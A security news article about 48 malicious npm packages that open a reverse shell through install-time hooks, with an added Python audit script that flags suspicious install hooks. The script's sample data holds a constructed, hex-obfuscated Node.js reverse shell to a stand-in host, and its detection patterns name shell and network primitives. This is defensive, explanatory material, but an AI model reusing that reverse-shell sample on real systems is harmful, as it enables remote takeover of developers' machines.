A new set of 48 malicious npm packages has been discovered in the npm registry with the capability to deploy a reverse shell on compromised systems.
"These packages, deceptively named to appear legitimate, contained obfuscated JavaScript designed to initiate a reverse shell on package install," software supply chain security firm Phylum said.
All of the counterfeit packages were published by an npm user named hktalent (GitHub, X). As of writing, 39 of the packages uploaded by the author are still available for download.
The attack chain is triggered after the package is installed, via an install-time lifecycle hook declared in package.json, which npm runs automatically without any action by the developer. The hook launches JavaScript code that establishes a reverse shell to rsh.51pwn[.]com.
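As an added illustration (not code from the article, from Phylum, or from the packages described), the following Python audit parses a package.json, reports every lifecycle hook npm would run automatically during install, and inspects the script file each hook launches for common reverse-shell and obfuscation markers. The package names, file names, the host rsh.example.invalid and the detection patterns are all constructed for this example and are not signatures taken from the real packages.

```python
"""Audit an npm package manifest for install-time hooks (added example)."""
import json
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Lifecycle scripts npm runs on its own during `npm install` / `npm ci`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Constructed heuristics (not a published rule set): each is a common
# building block of an install-time dropper or reverse shell.
SUSPICIOUS_SCRIPT = [
    (r"\bnode\s+\S+\.js\b", "runs a bundled JavaScript file at install time"),
    (r"\b(curl|wget)\b", "fetches remote content during install"),
    (r"\b(bash|sh)\s+-c\b", "spawns a shell during install"),
]
SUSPICIOUS_SOURCE = [
    (r"\b(eval|Function)\s*\(", "dynamic code execution"),
    (r"child_process|\.(spawn|exec|execSync)\s*\(", "process spawning"),
    (r"\bnet\.(connect|Socket|createConnection)\b", "raw TCP connection"),
    (r"(\\x[0-9a-fA-F]{2}){6,}", "long hex-escaped string (obfuscation)"),
    (r"/bin/(ba)?sh", "reference to a system shell"),
]


@dataclass
class Finding:
    hook: str                      # which lifecycle script npm would run
    command: str                   # the command it runs
    reasons: List[str] = field(default_factory=list)  # empty = review by hand


def audit_package_json(manifest_text: str,
                       sources: Optional[Dict[str, str]] = None) -> List[Finding]:
    """Return one Finding per lifecycle hook npm would execute on install.

    `sources` maps file paths inside the package (relative to its root) to
    their contents, so the script a hook invokes can be inspected.
    """
    manifest = json.loads(manifest_text)
    scripts = manifest.get("scripts") or {}
    findings: List[Finding] = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        reasons = [why for pat, why in SUSPICIOUS_SCRIPT if re.search(pat, cmd)]
        # Inspect every .js file the hook names, if its contents were supplied.
        for path in re.findall(r"\S+\.js\b", cmd):
            body = (sources or {}).get(path.lstrip("./"), "")
            reasons += [f"{path}: {why}"
                        for pat, why in SUSPICIOUS_SOURCE if re.search(pat, body)]
        findings.append(Finding(hook, cmd, reasons))
    return findings


# Constructed samples. The second mirrors the pattern the article describes
# (an install hook running obfuscated JavaScript); it is not a real package.
BENIGN_MANIFEST = json.dumps({
    "name": "left-align", "version": "1.0.0",
    "scripts": {"test": "node test.js", "build": "tsc"},
})
SUSPICIOUS_MANIFEST = json.dumps({
    "name": "string-fmt-utils", "version": "0.0.3",
    "scripts": {"postinstall": "node ./lib/setup.js"},
})
SUSPICIOUS_SOURCES = {
    # "child_process" hidden as a hex-escaped string, then a TCP connection
    # to a (fictitious) host with a shell attached to the socket.
    "lib/setup.js": (
        "const _0x4f=['\\x63\\x68\\x69\\x6c\\x64\\x5f\\x70\\x72\\x6f\\x63\\x65\\x73\\x73'];"
        "const cp=require(_0x4f[0]);const net=require('net');"
        "const s=net.connect(4444,'rsh.example.invalid',()=>{"
        "const sh=cp.spawn('/bin/sh',[]);s.pipe(sh.stdin);sh.stdout.pipe(s);});"
    ),
}

if __name__ == "__main__":
    for name, manifest, srcs in (("benign", BENIGN_MANIFEST, None),
                                 ("suspicious", SUSPICIOUS_MANIFEST, SUSPICIOUS_SOURCES)):
        print(name, [(f.hook, f.reasons) for f in audit_package_json(manifest, srcs)])
```

A hook with an empty `reasons` list is still worth a look, since any install script executes on the developer's machine; the heuristics only prioritise. Independently of such auditing, `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) stops npm from running these hooks at all, at the cost of breaking packages that legitimately rely on them.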
"In this particular case, the attacker published dozens of benign-sounding packages with several layers of obfuscation and deceptive tactics in an attempt to ultimately deploy a reverse shell on any machine that simply installs one of these packages," Phylum said.
The findings come close on the heels of revelations that two packages published to the Python Package Index (PyPI) under the guise of simplifying internationalization included malicious code designed to siphon sensitive Telegram Desktop application data and system information.
The packages, named localization-utils and locute, were found to retrieve the final payload from a dynamically generated Pastebin URL and exfiltrate the information to an actor-controlled Telegram channel.
The development highlights the growing interest of threat actors in open-source ecosystems, which lets them set up impactful supply chain attacks that can target many downstream consumers at once.
"These packages show a dedicated and elaborate effort to avoid detection through static analysis and visual inspection by employing a variety of obfuscation techniques," Phylum said, adding that they "serve as yet another stark reminder of the critical nature of dependency trust in our open-source ecosystems."